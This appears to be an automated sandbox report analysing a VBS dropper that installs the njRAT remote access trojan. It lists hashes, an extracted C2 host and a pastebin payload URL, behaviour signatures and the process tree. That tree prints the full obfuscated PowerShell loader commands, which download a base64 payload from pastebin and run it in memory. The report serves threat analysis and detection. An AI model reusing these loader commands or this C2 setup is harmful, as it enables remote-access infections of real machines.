Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-10-2024 01:25

General

  • Target

    48bb80b78ab20e88487589c0d691bd65a8d40f785d2d18d54c06bbedd09ca559.vbs

  • Size

    15.4MB

  • MD5

    3ac2f2a9e0ea75fabc9cd17a6cfad0c5

  • SHA1

    918caec409f9a49bc055bbfb02d458c131724c83

  • SHA256

    48bb80b78ab20e88487589c0d691bd65a8d40f785d2d18d54c06bbedd09ca559

  • SHA512

    be4ce3a8489eb2ac441a9ea7c61f93f1b64a4e8435f8bcfbad0c0d83fcc1b7d6e6b5c3b0309616b7ed2bcbd173ce5427e257e14dc84e491766ffbc51af3a1327

  • SSDEEP

    192:9HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHM:qXmHsr0+uF8

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://pastebin.com/raw/V9y5Q5vv

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

michael2009nj.duckdns.org:2828

Mutex

bf4e531b630e4de6ab2

Attributes
  • reg_key

    bf4e531b630e4de6ab2

  • splitter

    @!#&^%$

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 38 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\48bb80b78ab20e88487589c0d691bd65a8d40f785d2d18d54c06bbedd09ca559.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4112
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆B4☆Hc☆cQB6☆Hg☆I☆☆9☆C☆☆Jw☆w☆DM☆Jw☆7☆CQ☆YgB4☆HY☆YwBy☆C☆☆PQ☆g☆Cc☆JQBw☆Ho☆QQBj☆E8☆ZwBJ☆G4☆TQBy☆CU☆Jw☆7☆Fs☆UwB5☆HM☆d☆Bl☆G0☆LgBO☆GU☆d☆☆u☆FM☆ZQBy☆HY☆aQBj☆GU☆U☆Bv☆Gk☆bgB0☆E0☆YQBu☆GE☆ZwBl☆HI☆XQ☆6☆Do☆UwBl☆HI☆dgBl☆HI☆QwBl☆HI☆d☆Bp☆GY☆aQBj☆GE☆d☆Bl☆FY☆YQBs☆Gk☆Z☆Bh☆HQ☆aQBv☆G4☆QwBh☆Gw☆b☆Bi☆GE☆YwBr☆C☆☆PQ☆g☆Hs☆J☆B0☆HI☆dQBl☆H0☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆agBr☆G8☆cwBz☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆K☆BO☆GU☆dw☆t☆E8☆YgBq☆GU☆YwB0☆C☆☆TgBl☆HQ☆LgBX☆GU☆YgBD☆Gw☆aQBl☆G4☆d☆☆p☆C4☆R☆Bv☆Hc☆bgBs☆G8☆YQBk☆FM☆d☆By☆Gk☆bgBn☆Cg☆JwBo☆HQ☆d☆Bw☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBW☆Dk☆eQ☆1☆FE☆NQB2☆HY☆Jw☆p☆C☆☆KQ☆g☆Ck☆OwBb☆HM☆eQBz☆HQ☆ZQBt☆C4☆QQBw☆H☆☆R☆Bv☆G0☆YQBp☆G4☆XQ☆6☆Do☆QwB1☆HI☆cgBl☆G4☆d☆BE☆G8☆bQBh☆Gk☆bg☆u☆Ew☆bwBh☆GQ☆K☆☆k☆Go☆awBv☆HM☆cw☆p☆C4☆RwBl☆HQ☆V☆B5☆H☆☆ZQ☆o☆Cc☆V☆Bl☆Gg☆dQBs☆GM☆a☆Bl☆HM☆W☆B4☆Fg☆e☆B4☆C4☆QwBs☆GE☆cwBz☆DE☆Jw☆p☆C4☆RwBl☆HQ☆TQBl☆HQ☆a☆Bv☆GQ☆K☆☆n☆E0☆cwBx☆EI☆SQBi☆Fk☆Jw☆p☆C4☆SQBu☆HY☆bwBr☆GU☆K☆☆k☆G4☆dQBs☆Gw☆L☆☆g☆Fs☆bwBi☆Go☆ZQBj☆HQ☆WwBd☆F0☆I☆☆o☆Cc☆W☆B1☆E0☆TgB1☆FQ☆a☆Bp☆C8☆dwBh☆HI☆LwBt☆G8☆Yw☆u☆G4☆aQBi☆GU☆d☆Bz☆GE☆c☆☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆GI☆e☆B2☆GM☆cg☆g☆Cw☆I☆☆n☆F8☆XwBf☆Ek☆bgB2☆Gk☆YwB0☆HU☆cwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆LQ☆t☆C0☆LQ☆t☆C0☆LQ☆n☆Cw☆I☆☆k☆Hg☆dwBx☆Ho☆e☆☆s☆C☆☆Jw☆x☆Cc☆L☆☆g☆Cc☆UgBv☆GQ☆YQ☆n☆C☆☆KQ☆p☆Ds☆';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\48bb80b78ab20e88487589c0d691bd65a8d40f785d2d18d54c06bbedd09ca559.vbs');powershell $KByHL;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1536
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$xwqzx = '03';$bxvcr = 'C:\Users\Admin\AppData\Local\Temp\48bb80b78ab20e88487589c0d691bd65a8d40f785d2d18d54c06bbedd09ca559.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $jkoss = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($jkoss).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('XuMNuThi/war/moc.nibetsap//:sptth' , $bxvcr , '___Invictus_________________________________________-------', $xwqzx, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3108
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\48bb80b78ab20e88487589c0d691bd65a8d40f785d2d18d54c06bbedd09ca559.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2352
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:3112

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    6cf293cb4d80be23433eecf74ddb5503

    SHA1

    24fe4752df102c2ef492954d6b046cb5512ad408

    SHA256

    b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

    SHA512

    0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    eedeb218af57d184b7a06908d84e1f4f

    SHA1

    da8c874abd286ac085f7105d3d9da30336b09509

    SHA256

    f514ecbc9a8915c19aab328ecb319f730ddaf6d6d35cbf7b67bcdd00a4a75d80

    SHA512

    3be9e8b318be85f46692414419847147d9be948e0178962e95ce32899c52a6f26ec94e464a69770bc7a212681f24657222eae14646e484b2d0423076784ec29c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    50a8221b93fbd2628ac460dd408a9fc1

    SHA1

    7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

    SHA256

    46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

    SHA512

    27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3d3cnsxg.ndb.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1536-12-0x00007FFA585E0000-0x00007FFA590A1000-memory.dmp

    Filesize

    10.8MB

  • memory/1536-0-0x00007FFA585E3000-0x00007FFA585E5000-memory.dmp

    Filesize

    8KB

  • memory/1536-11-0x00007FFA585E0000-0x00007FFA590A1000-memory.dmp

    Filesize

    10.8MB

  • memory/1536-1-0x000002D403A50000-0x000002D403A72000-memory.dmp

    Filesize

    136KB

  • memory/1536-42-0x00007FFA585E0000-0x00007FFA590A1000-memory.dmp

    Filesize

    10.8MB

  • memory/3108-22-0x000001477C4D0000-0x000001477C4D8000-memory.dmp

    Filesize

    32KB

  • memory/3108-35-0x000001477C680000-0x000001477C68A000-memory.dmp

    Filesize

    40KB

  • memory/3112-36-0x0000000000400000-0x000000000040C000-memory.dmp

    Filesize

    48KB

  • memory/3112-43-0x0000000005500000-0x000000000559C000-memory.dmp

    Filesize

    624KB

  • memory/3112-44-0x0000000005B50000-0x00000000060F4000-memory.dmp

    Filesize

    5.6MB

  • memory/3112-45-0x0000000005720000-0x00000000057B2000-memory.dmp

    Filesize

    584KB

  • memory/3112-46-0x00000000056C0000-0x00000000056CA000-memory.dmp

    Filesize

    40KB

  • memory/3112-47-0x0000000005920000-0x0000000005986000-memory.dmp

    Filesize

    408KB